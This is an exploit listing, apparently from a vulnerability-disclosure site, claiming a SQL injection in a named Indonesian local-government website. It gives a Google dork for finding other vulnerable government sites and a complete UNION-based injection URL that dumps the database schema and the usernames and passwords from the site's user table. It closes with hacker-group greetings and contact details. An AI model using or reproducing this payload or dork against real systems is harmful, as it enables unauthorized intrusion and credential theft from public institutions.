Kelurahan Komet Banjarbaru Kota - SQL Injection

2020.09.17
id M0lleXploit-1307 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: site:go.id inurl:/berita_detail.php?id=1

# Exploit Title : Kelurahan Komet Banjarbaru Kota - SQL Injection # Author : ./0lleXploit-1307 # Dork : site:go.id inurl:/berita_detail.php?id=1 # Vulnerabelity Site - https://kel-komet.banjarbarukota.go.id/public/berita_detail.php? id=-1%27+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),5,/*!50000(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+tb_user)*/--+- # Greetz - Garuda Anon Security - Stuck Xploiter Crew - Muslim Cyber Security - Light Cyber Indonesia # Contact - Email : byte0x.id@yahoo.com - Twitter : twitter.com/h4ndsatiz3r


See this note in RAW Version
Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top